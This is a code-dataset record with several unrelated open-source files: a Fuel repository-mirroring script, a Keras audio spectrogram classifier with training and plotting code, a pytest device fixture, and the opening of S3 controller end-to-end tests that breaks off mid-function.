"Apache-2.0"
] | null | null | null | fuel-package-updates.py | artem-panchenko/fuel-updates | 87abddfeae749ee81c58328410f842ccd9afe3dc | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import re
import subprocess
import zlib
from optparse import OptionParser
from urllib2 import HTTPError
from urllib2 import urlopen
from urlparse import urlparse
from xml.dom.minidom import parseString
logger = logging.getLogger(__name__)
if __name__ == '__main__':
main()
| 37.210227 | 79 | 0.619331 | # Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import re
import subprocess
import zlib
from optparse import OptionParser
from urllib2 import HTTPError
from urllib2 import urlopen
from urlparse import urlparse
from xml.dom.minidom import parseString
logger = logging.getLogger(__name__)
class Settings(object):
supported_distros = ('centos', 'ubuntu')
supported_releases = ('2014.2-6.1',) # trailing comma keeps this a tuple rather than a bare string
updates_destinations = {
'centos': r'/var/www/nailgun/{0}/centos/updates',
'ubuntu': r'/var/www/nailgun/{0}/ubuntu/updates'
}
class UpdatePackagesException(Exception):
pass
def exec_cmd(cmd):
logger.debug('Execute command "%s"', cmd)
child = subprocess.Popen(
cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True)
logger.debug('Stdout and stderr of command "%s":', cmd)
for line in child.stdout:
logger.debug(line.rstrip())
return _wait_and_check_exit_code(cmd, child)
def _wait_and_check_exit_code(cmd, child):
child.wait()
exit_code = child.returncode
logger.debug('Command "%s" was executed', cmd)
return exit_code
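# --- Editor's note (added): an illustrative helper, not part of the original script;
# --- the shell command below is only an example.
def _example_exec_cmd():
    """Return the exit code (0 on success) of a sample shell command run through exec_cmd."""
    return exec_cmd('echo "repository sync check"')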
def get_repository_packages(remote_repo_url, distro):
repo_url = urlparse(remote_repo_url)
packages = []
if distro in ('ubuntu',):
packages_url = '{0}/Packages'.format(repo_url.geturl())
pkgs_raw = urlopen(packages_url).read()
for pkg in pkgs_raw.split('\n'):
match = re.search(r'^Package: (\S+)\s*$', pkg)
if match:
packages.append(match.group(1))
elif distro in ('centos',):
packages_url = '{0}/repodata/primary.xml.gz'.format(repo_url.geturl())
pkgs_xml = parseString(zlib.decompressobj(zlib.MAX_WBITS | 32).
decompress(urlopen(packages_url).read()))
for pkg in pkgs_xml.getElementsByTagName('package'):
packages.append(
pkg.getElementsByTagName('name')[0].firstChild.nodeValue)
return packages
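# --- Editor's note (added): an illustrative helper, not part of the original script. It shows
# --- the Debian 'Packages' index format the ubuntu branch above expects; the stanzas are invented.
def _example_parse_packages_index():
    """Return the package names found in a tiny in-memory 'Packages' index."""
    sample = ("Package: linux-image-generic\n"
              "Version: 3.13.0-24.46\n"
              "\n"
              "Package: openssl\n"
              "Version: 1.0.1f-1ubuntu2\n")
    names = []
    for line in sample.split('\n'):
        match = re.search(r'^Package: (\S+)\s*$', line)
        if match:
            names.append(match.group(1))
    return names  # ['linux-image-generic', 'openssl']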
def mirror_remote_repository(remote_repo_url, local_repo_path):
repo_url = urlparse(remote_repo_url)
cut_dirs = len(repo_url.path.strip('/').split('/'))
download_cmd = ('wget --recursive --no-parent --no-verbose --reject "index'
'.html*,*.gif,*.key,*.gpg" --exclude-directories "{pwd}/re'
'pocache" --directory-prefix {path} -nH --cut-dirs={cutd} '
'{url}').format(pwd=repo_url.path.rstrip('/'),
path=local_repo_path,
cutd=cut_dirs,
url=repo_url.geturl())
if exec_cmd(download_cmd) != 0:
raise UpdatePackagesException('Mirroring of remote packages'
' repository failed!')
def main():
settings = Settings()
sh = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
logger.setLevel(logging.INFO)
parser = OptionParser(
description="Pull updates for a given release of Fuel based on "
"the provided URL."
)
parser.add_option('-d', '--distro', dest='distro', default=None,
help='Linux distribution name (required)')
parser.add_option('-r', '--release', dest='release', default=None,
help='Fuel release name (required)')
parser.add_option("-u", "--url", dest="url", default="",
help="Remote repository URL (required)")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="Enable debug output")
(options, args) = parser.parse_args()
if options.verbose:
logger.setLevel(logging.DEBUG)
if options.distro not in settings.supported_distros:
raise UpdatePackagesException(
'Linux distro "{0}" is not supported. Please specify one of the '
'following: "{1}". See help (--help) for details.'.format(
options.distro, ', '.join(settings.supported_distros)))
if options.release not in settings.supported_releases:
raise UpdatePackagesException(
'Fuel release "{0}" is not supported. Please specify one of the '
'following: "{1}". See help (--help) for details.'.format(
options.release, ', '.join(settings.supported_releases)))
if urlparse(options.url).scheme not in ('http', 'https'): # check the scheme explicitly; membership in the ParseResult tuple was fragile
raise UpdatePackagesException(
'Repository url "{0}" does not look like a valid URL. '
'See help (--help) for details.'.format(options.url))
updates_path = settings.updates_destinations[options.distro].format(
options.release)
if not os.path.exists(updates_path):
os.makedirs(updates_path)
logger.info('Checking remote repository...')
try:
pkgs = get_repository_packages(options.url, options.distro)
except HTTPError as e:
if e.code == 404:
raise UpdatePackagesException(
'Remote repository does not contain packages'
' metadata ({0})!'.format(options.distro))
else:
raise
if len(pkgs) < 1:
raise UpdatePackagesException('Remote repository "{0}" does not '
'contain any packages.'.format(options.url)) # fill the placeholder that was never formatted
logger.debug('Remote repository contains the following packages: {0}'.format(pkgs))
logger.info('Started mirroring remote repository...')
mirror_remote_repository(options.url, updates_path)
logger.info('Remote repository "{url}" for "{release}" ({distro}) was '
'successfuly mirrored to {path} folder.'.format(
url=options.url,
release=options.release,
distro=options.distro,
path=updates_path))
if __name__ == '__main__':
main()
| 5,198 | 266 | 161 |
59d5cdcca3e8dcc86bf49dbd3064cc9bfffae240 | 12,461 | py | Python | 11_networks-complite-05.py | Accioy/voice-singal-classification | b6744af9732fd38c41cf3cbf11c170a962cee6c7 | [
"MIT"
] | null | null | null | 11_networks-complite-05.py | Accioy/voice-singal-classification | b6744af9732fd38c41cf3cbf11c170a962cee6c7 | [
"MIT"
] | null | null | null | 11_networks-complite-05.py | Accioy/voice-singal-classification | b6744af9732fd38c41cf3cbf11c170a962cee6c7 | [
"MIT"
] | null | null | null | """
Key points: 1. Build a convolutional neural network on spectrograms (10 classes); this file is the fifth version.
2. Three selectable tasks: train and save the model, evaluate the model, or predict classes.
3. Three training approaches: 2-D convolution, convolution along the time axis, or convolution along the frequency axis.
4. Added code that plots the accuracy and loss curves.
5. Commented out the early-stopping lines.
6. Changed the training callback to logs_loss.
Improvement over earlier versions: the audio is preprocessed before training.
Results: after 300 epochs the accuracy reaches about 84%;
the accuracy and loss curves look good, while the other curves are less useful.
"""
import numpy as np
from scipy import signal
import scipy.io.wavfile as wav
import os
import time
import sys
from keras.utils.np_utils import to_categorical
import matplotlib.pyplot as plt
# import skimage.io
import platform
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
config = tf.ConfigProto()
config.gpu_options.allow_growth=True # do not grab all GPU memory up front; allocate on demand
session = tf.Session(config=config)
plt.switch_backend('agg')
a = platform.platform()
if "Windows" in a:
splitchar = "\\"
elif "Linux" in a:
splitchar = "/"
print('\n', a, '\n')
ROOT_DIR = os.path.abspath('.')
wav_path = os.path.join(ROOT_DIR, "ALL_hd_random")
##########################################################################
##########################################################################
number_of_classes = 10
# Read the wav file lists
train_files = get_wav_files(os.path.join(wav_path, "train"))
test_files = get_wav_files(os.path.join(wav_path, "test"))
# Preprocess the data (spectrograms and one-hot labels)
train_x, train_y, max_freq, max_time = data_preprocess(train_files, number_of_classes)
test_x, test_y, max_freq, max_time = data_preprocess(test_files, number_of_classes)
import random
randnum = random.randint(0, 100)
random.seed(randnum)
random.shuffle(train_x)
random.seed(randnum)
random.shuffle(train_y)
from keras.models import Sequential, load_model
from keras.layers import MaxPool1D, Conv1D, Conv2D, MaxPool2D, Flatten, Dense, BatchNormalization, Dropout
from keras.callbacks import EarlyStopping
from keras.optimizers import RMSprop
from keras.metrics import categorical_accuracy
from keras import regularizers
import keras
task = 'train' # train or evaluate or predict
if task == 'train':
model = Sequential()
# model.add(Conv2D(filters=16,kernel_size=(3,3), input_shape=(max_time,max_freq,1),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=8,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=4,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Flatten())
# #model.add(Dropout(0.5))
# model.add(Dense(128, activation='relu'))
# #model.add(Dropout(0.5))
# model.add(Dense(number_of_classes, activation='softmax'))
model.add(Conv1D(max_freq, 10, input_shape=(max_time, max_freq), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Conv1D(max_freq, 4, activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(max_freq, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(number_of_classes, activation='softmax'))
model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=['categorical_accuracy'])
# When training begins, create containers that hold the loss and accuracy values
# Values are appended batch by batch
# Plotting: each curve is drawn in its own figure; modify the method if you want all curves in one figure
# Because the plots are refreshed only every 5 seconds, the figures produced during training may not cover the whole run
# (another 0-5 seconds of training can follow the last refresh)
# so the plotting method is called once more after training finishes
logs_loss = LossHistory()
# model=load_model('voice_recog_spectrogram_new1.h5')
# print(model.summary())
# model.pop()
# model.add(Dense(number_of_classes, activation='softmax',name='output'))
# model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=[categorical_accuracy])
# early_stopping = EarlyStopping(monitor='val_loss', patience=10)
model.fit(train_x, train_y, batch_size=20, epochs=300, validation_split=0.1, callbacks=[logs_loss]) # callbacks=[early_stopping]
# Save the trained model.
model.save('voice_recog_spectrogram_preprcsess_300epochs_04.h5')
logs_loss.end_draw()
"""Method 1: plot the acc and loss curves directly once training finishes
train_log = model.fit_generator(train_generator,
steps_per_epoch = nb_train_samples// batch_size,
epochs = epochs,
validation_data = validation_generator,
validation_steps =nb_validation_samples // batch_size,
)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), train_log.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), train_log.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), train_log.history["acc"], label="train_acc")
plt.plot(np.arange(0, epochs), train_log.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_alexnet_{:d}e.jpg".format(epochs))
"""
"""Method 2: save the Accuracy and Loss values to a csv file during training, then read the file back and plot afterwards
import pandas as pd
import matplotlib.pyplot as plt
log = pd.read_csv('./log/mix_r40_g800_log_0511160953_300e.csv')
l = list(log['epoch;acc;loss;val_acc;val_loss'])
epoch = []
acc = []
loss = []
val_acc = []
val_loss = []
for i in range(0,len(l)):
epoch.append(l[i].split(';')[0])
acc.append(l[i].split(';')[1])
loss.append(l[i].split(';')[2])
val_acc.append(l[i].split(';')[3])
val_loss.append(l[i].split(';')[4])
plt.style.use("ggplot") # set the plotting style
plt.figure(figsize=(15,10)) # set the figure size, in inches
plt.plot(epoch, loss, label="train_loss")
plt.plot(epoch, val_loss, label="val_loss")
plt.plot(epoch, acc, label="train_acc")
plt.plot(epoch, val_acc, label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_mix_40-800_300e.jpg")
"""
elif task == 'evaluate':
model = load_model('voice_recog_spectrogram_new2.h5')
accuracy = model.evaluate(test_x, test_y, batch_size=1)
print('test loss and accuracy:', accuracy)
elif task == 'predict':
model = load_model('voice_recog_spectrogram_new2.h5')
result = model.predict_on_batch(test_x)
print(result)
# from keras.utils.vis_utils import plot_model
# plot_model(model,to_file="model_1.png",show_shapes=True)
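# --- Editor's note (added): an illustrative helper, not part of the original script; the
# --- audio below is synthetic. It shows why the model uses input_shape=(max_time, max_freq):
# --- scipy returns a (freq_bins, time_bins) spectrogram, which the preprocessing transposes
# --- so that Conv1D slides along the time axis.
def _example_spectrogram_shape():
    """Return the (time_bins, freq_bins) shape produced for one 154449-sample clip."""
    fake_audio = np.random.randint(-1000, 1000, size=154449).astype(np.int16)
    freqs, times, spec = signal.spectrogram(fake_audio)  # spec.shape == (len(freqs), len(times))
    return spec.T.shape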
| 35.910663 | 133 | 0.609823 | """
Key points: 1. Build a convolutional neural network on spectrograms (10 classes); this file is the fifth version.
2. Three selectable tasks: train and save the model, evaluate the model, or predict classes.
3. Three training approaches: 2-D convolution, convolution along the time axis, or convolution along the frequency axis.
4. Added code that plots the accuracy and loss curves.
5. Commented out the early-stopping lines.
6. Changed the training callback to logs_loss.
Improvement over earlier versions: the audio is preprocessed before training.
Results: after 300 epochs the accuracy reaches about 84%;
the accuracy and loss curves look good, while the other curves are less useful.
"""
import numpy as np
from scipy import signal
import scipy.io.wavfile as wav
import os
import time
import sys
from keras.utils.np_utils import to_categorical
import matplotlib.pyplot as plt
# import skimage.io
import platform
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
config = tf.ConfigProto()
config.gpu_options.allow_growth=True # do not grab all GPU memory up front; allocate on demand
session = tf.Session(config=config)
plt.switch_backend('agg')
a = platform.platform()
if "Windows" in a:
splitchar = "\\"
elif "Linux" in a:
splitchar = "/"
print('\n', a, '\n')
ROOT_DIR = os.path.abspath('.')
wav_path = os.path.join(ROOT_DIR, "ALL_hd_random")
def get_wav_files(wav_path):
wav_files = []
for (dirpath, dirnames, filenames) in os.walk(wav_path):
for filename in filenames:
if filename.endswith('.wav') or filename.endswith('.WAV'):
filename_path = os.sep.join([dirpath, filename])
if os.stat(filename_path).st_size < 240000: # skip files that are too small
continue
wav_files.append(filename_path)
return wav_files
def data_preprocess(wav_files, number_of_classes):
data_x = []
data_y = []
sample_frequencies = []
segment_times = []
begin_time = time.time()
for i, onewav in enumerate(wav_files):
if i % 5 == 4: # after every 5 files, refresh the progress readout
gaptime = time.time() - begin_time
percent = float(i) * 100 / len(wav_files)
eta_time = gaptime * 100 / (percent + 0.01) - gaptime
strprogress = "[" + "=" * int(percent // 2) + ">" + "-" * int(50 - percent // 2) + "]"
str_log = ("%.2f %% %s %s/%s \t used:%d s eta:%d s" % (
percent, strprogress, i, len(wav_files), gaptime, eta_time))
sys.stdout.write('\r' + str_log)
elements = onewav.split(splitchar)
for x in elements:
if x == '01 diode':
label = 0
elif x == '02 metalnode':
label = 1
elif x == '03 qiangkaiguan':
label = 2
elif x == '04 mouse':
label = 3
elif x == '05 dianluban':
label = 4
elif x == '06 libattery':
label = 5
elif x == '07 charger':
label = 6
elif x == '08 A-wav':
label = 7
elif x == '09 qiangchazuo':
label = 8
elif x == '10 netport':
label = 9
(rate, data) = wav.read(onewav)
# Note: the left channel is clear in every recording while the right channel is very weak and hard to use, so only the left channel is kept here
data = np.transpose(data)[0]
'''Forward option: take 3 seconds starting at the first sample above the noise floor:
for j in range(len(data)): # len(aud) gives the number of rows of the 2-D array aud and len(aud[0]) the number of columns; for higher dimensions each level is len(A[i]).
if data[j] > 10 or data[j] < -10:
data = data[j:j + 132400].copy()
break
'''
'''Backward option: take the last 3.5 seconds:'''
data = data[-154450:-1].copy()
sample_frequency, segment_time, spectrogram = signal.spectrogram(data)
sample_frequencies.append(sample_frequency)
segment_times.append(segment_time)
data_x.append(spectrogram)
data_y.append(label)
# len_freq = []
# len_time = []
# for i in sample_frequencies:
# len_freq.append(len(i))
# for i in segment_times:
# len_time.append(len(i))
#print("\n")
#print(max(len_freq), min(len_freq), max(len_time), min(len_time))
# train_x = np.asarray(train_x)
# train_y = np.asarray(train_y)
max_freq = sample_frequencies[0]
max_time = segment_times[0]
#data_x = [np.concatenate([i, np.zeros((max_freq, max_time - i.shape[1]))], axis=1) for i in data_x]
aaa=np.shape(data_x[0])
data_x = np.array(data_x)
print("\n")
data_x = np.transpose(data_x, axes=(0, 2, 1))
# data_x=np.expand_dims(data_x,axis=3)
data_y = to_categorical(data_y, num_classes=number_of_classes)
return data_x, data_y, max_freq, max_time
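# --- Editor's note (added): an illustrative helper, not part of the original script; the
# --- label values are invented. It shows what to_categorical does to the integer labels above.
def _example_one_hot_labels():
    """Return the 3x10 one-hot matrix for the integer labels [0, 3, 9]."""
    return to_categorical([0, 3, 9], num_classes=10)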
##########################################################################
##########################################################################
number_of_classes = 10
# Read the wav file lists
train_files = get_wav_files(os.path.join(wav_path, "train"))
test_files = get_wav_files(os.path.join(wav_path, "test"))
# Preprocess the data (spectrograms and one-hot labels)
train_x, train_y, max_freq, max_time = data_preprocess(train_files, number_of_classes)
test_x, test_y, max_freq, max_time = data_preprocess(test_files, number_of_classes)
import random
randnum = random.randint(0, 100)
random.seed(randnum)
random.shuffle(train_x)
random.seed(randnum)
random.shuffle(train_y)
from keras.models import Sequential, load_model
from keras.layers import MaxPool1D, Conv1D, Conv2D, MaxPool2D, Flatten, Dense, BatchNormalization, Dropout
from keras.callbacks import EarlyStopping
from keras.optimizers import RMSprop
from keras.metrics import categorical_accuracy
from keras import regularizers
import keras
task = 'train' # train or evaluate or predict
if task == 'train':
model = Sequential()
# model.add(Conv2D(filters=16,kernel_size=(3,3), input_shape=(max_time,max_freq,1),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=8,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=4,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Flatten())
# #model.add(Dropout(0.5))
# model.add(Dense(128, activation='relu'))
# #model.add(Dropout(0.5))
# model.add(Dense(number_of_classes, activation='softmax'))
model.add(Conv1D(max_freq, 10, input_shape=(max_time, max_freq), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Conv1D(max_freq, 4, activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(max_freq, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(number_of_classes, activation='softmax'))
model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=['categorical_accuracy'])
class LossHistory(keras.callbacks.Callback):
# When training begins, create containers that hold the loss and accuracy values
def on_train_begin(self, logs={}):
self.losses = {'batch': [], 'epoch': []}
self.accuracy = {'batch': [], 'epoch': []}
self.val_loss = {'batch': [], 'epoch': []}
self.val_acc = {'batch': [], 'epoch': []}
# Values are appended batch by batch
def on_batch_end(self, batch, logs={}):
# After every batch, append loss and acc to the containers
self.losses['batch'].append(logs.get('loss'))
self.accuracy['batch'].append(logs.get('acc'))
self.val_loss['batch'].append(logs.get('val_loss'))
self.val_acc['batch'].append(logs.get('val_acc'))
# Every five seconds, redraw the plots from the values collected so far
if int(time.time()) % 5 == 0:
self.draw_p(self.losses['batch'], 'loss', 'train_batch')
self.draw_p(self.accuracy['batch'], 'acc', 'train_batch')
self.draw_p(self.val_loss['batch'], 'loss', 'val_batch')
self.draw_p(self.val_acc['batch'], 'acc', 'val_batch')
def on_epoch_end(self, batch, logs={}):
# After every epoch, append loss and acc to the containers
self.losses['epoch'].append(logs.get('loss'))
self.accuracy['epoch'].append(logs.get('acc'))
self.val_loss['epoch'].append(logs.get('val_loss'))
self.val_acc['epoch'].append(logs.get('val_acc'))
# Every five seconds, redraw the plots from the values collected so far
if int(time.time()) % 5 == 0:
self.draw_p(self.losses['epoch'], 'loss', 'train_epoch')
self.draw_p(self.accuracy['epoch'], 'acc', 'train_epoch')
self.draw_p(self.val_loss['epoch'], 'loss', 'val_epoch')
self.draw_p(self.val_acc['epoch'], 'acc', 'val_epoch')
# Plotting: each curve is drawn in its own figure; modify this method if you want all curves in one figure
def draw_p(self, lists, label, type):
plt.figure()
plt.plot(range(len(lists)), lists, 'r', label=label)
plt.ylabel(label)
plt.xlabel(type)
plt.legend(loc="upper right")
plt.savefig(type + '_' + label + '.jpg')
# Because the plots are refreshed only every 5 seconds, the figures produced during training may not cover the whole run
# (another 0-5 seconds of training can follow the last refresh)
# so this method is called once more after the whole training run finishes
def end_draw(self):
self.draw_p(self.losses['batch'], 'loss', 'train_batch')
self.draw_p(self.accuracy['batch'], 'acc', 'train_batch')
self.draw_p(self.val_loss['batch'], 'loss', 'val_batch')
self.draw_p(self.val_acc['batch'], 'acc', 'val_batch')
self.draw_p(self.losses['epoch'], 'loss', 'train_epoch')
self.draw_p(self.accuracy['epoch'], 'acc', 'train_epoch')
self.draw_p(self.val_loss['epoch'], 'loss', 'val_epoch')
self.draw_p(self.val_acc['epoch'], 'acc', 'val_epoch')
logs_loss = LossHistory()
# model=load_model('voice_recog_spectrogram_new1.h5')
# print(model.summary())
# model.pop()
# model.add(Dense(number_of_classes, activation='softmax',name='output'))
# model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=[categorical_accuracy])
# early_stopping = EarlyStopping(monitor='val_loss', patience=10)
model.fit(train_x, train_y, batch_size=20, epochs=300, validation_split=0.1, callbacks=[logs_loss]) # callbacks=[early_stopping]
# Save the trained model.
model.save('voice_recog_spectrogram_preprcsess_300epochs_04.h5')
logs_loss.end_draw()
"""Method 1: plot the acc and loss curves directly once training finishes
train_log = model.fit_generator(train_generator,
steps_per_epoch = nb_train_samples// batch_size,
epochs = epochs,
validation_data = validation_generator,
validation_steps =nb_validation_samples // batch_size,
)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), train_log.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), train_log.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), train_log.history["acc"], label="train_acc")
plt.plot(np.arange(0, epochs), train_log.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_alexnet_{:d}e.jpg".format(epochs))
"""
"""Method 2: save the Accuracy and Loss values to a csv file during training, then read the file back and plot afterwards
import pandas as pd
import matplotlib.pyplot as plt
log = pd.read_csv('./log/mix_r40_g800_log_0511160953_300e.csv')
l = list(log['epoch;acc;loss;val_acc;val_loss'])
epoch = []
acc = []
loss = []
val_acc = []
val_loss = []
for i in range(0,len(l)):
epoch.append(l[i].split(';')[0])
acc.append(l[i].split(';')[1])
loss.append(l[i].split(';')[2])
val_acc.append(l[i].split(';')[3])
val_loss.append(l[i].split(';')[4])
plt.style.use("ggplot") # set the plotting style
plt.figure(figsize=(15,10)) # set the figure size, in inches
plt.plot(epoch, loss, label="train_loss")
plt.plot(epoch, val_loss, label="val_loss")
plt.plot(epoch, acc, label="train_acc")
plt.plot(epoch, val_acc, label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_mix_40-800_300e.jpg")
"""
elif task == 'evaluate':
model = load_model('voice_recog_spectrogram_new2.h5')
accuracy = model.evaluate(test_x, test_y, batch_size=1)
print('test loss and accuracy:', accuracy)
elif task == 'predict':
model = load_model('voice_recog_spectrogram_new2.h5')
result = model.predict_on_batch(test_x)
print(result)
# from keras.utils.vis_utils import plot_model
# plot_model(model,to_file="model_1.png",show_shapes=True)
| 5,976 | 23 | 224 |
e25bf8be3fd6bade037eaf4f8cc3eb38deb9550a | 470 | py | Python | tests/fixtures/device.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 26 | 2019-03-04T20:08:57.000Z | 2022-01-22T13:40:00.000Z | tests/fixtures/device.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 379 | 2019-03-03T12:16:05.000Z | 2022-03-29T13:44:46.000Z | tests/fixtures/device.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 12 | 2019-11-22T21:19:19.000Z | 2022-03-14T17:44:59.000Z | import pytest
import torch
DEVICES = ["cpu"]
if torch.cuda.is_available():
DEVICES.append("cuda")
@pytest.fixture(params=DEVICES)
def device(request):
"""parametrized device function,
that returns string names of the devices
that ``torch`` considers "available".
causes any test using ``device`` fixture to run just once
if only a cpu is available,
and twice if ``torch.cuda.is_available()`` returns ``True``."""
return request.param
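# --- Editor's note (added): a hypothetical test, not part of the original fixture module. It
# --- shows how the parametrized ``device`` fixture is consumed: pytest runs it once per entry
# --- in DEVICES ("cpu", plus "cuda" when available).
def test_tensor_lands_on_requested_device(device):
    x = torch.zeros(1, device=device)
    assert x.device.type == device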
| 24.736842 | 67 | 0.695745 | import pytest
import torch
DEVICES = ["cpu"]
if torch.cuda.is_available():
DEVICES.append("cuda")
@pytest.fixture(params=DEVICES)
def device(request):
"""parametrized device function,
that returns string names of the devices
that ``torch`` considers "available".
causes any test using ``device`` fixture to run just once
if only a cpu is available,
and twice if ``torch.cuda.is_available()`` returns ``True``."""
return request.param
| 0 | 0 | 0 |
aadeedeee12237575f8cdcec6f32a2ad4677f9c5 | 11,329 | py | Python | test/e2e/tests/test_bucket.py | vijtrip2/s3-controller | b1a21ab237746646255b78412bcbfcd249b72f61 | [
"Apache-2.0"
] | null | null | null | test/e2e/tests/test_bucket.py | vijtrip2/s3-controller | b1a21ab237746646255b78412bcbfcd249b72f61 | [
"Apache-2.0"
] | null | null | null | test/e2e/tests/test_bucket.py | vijtrip2/s3-controller | b1a21ab237746646255b78412bcbfcd249b72f61 | [
"Apache-2.0"
] | null | null | null | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the S3 Bucket API.
"""
import pytest
import time
import logging
import re
from typing import Generator
from dataclasses import dataclass
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_s3_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import BootstrapResources, get_bootstrap_resources
RESOURCE_PLURAL = "buckets"
CREATE_WAIT_AFTER_SECONDS = 10
MODIFY_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
@dataclass
@pytest.fixture(scope="function")
@service_marker | 38.016779 | 109 | 0.713655 | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the S3 Bucket API.
"""
import pytest
import time
import logging
import re
from typing import Generator
from dataclasses import dataclass
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_s3_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import BootstrapResources, get_bootstrap_resources
RESOURCE_PLURAL = "buckets"
CREATE_WAIT_AFTER_SECONDS = 10
MODIFY_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
@dataclass
class Bucket:
ref: k8s.CustomResourceReference
resource_name: str
resource_data: str
def get_bucket(s3_resource, bucket_name: str):
return s3_resource.Bucket(bucket_name)
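# --- Editor's note (added): an illustrative helper, not part of the original test module; the
# --- bucket name is a placeholder. It shows how the boto3 Bucket resource returned by
# --- get_bucket() is used further down: sub-resources such as Tagging() or Cors() are read lazily.
def _example_read_bucket_tags(s3_resource, bucket_name="example-bucket"):
    """Return the tag set of a bucket via the boto3 resource API."""
    bucket = get_bucket(s3_resource, bucket_name)
    return bucket.Tagging().tag_set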
def bucket_exists(s3_client, bucket: Bucket) -> bool:
try:
resp = s3_client.list_buckets()
except Exception as e:
logging.debug(e)
return False
buckets = resp["Buckets"]
for _bucket in buckets:
if _bucket["Name"] == bucket.resource_name:
return True
return False
def load_bucket_resource(resource_file_name: str, resource_name: str):
replacements = REPLACEMENT_VALUES.copy()
replacements["BUCKET_NAME"] = resource_name
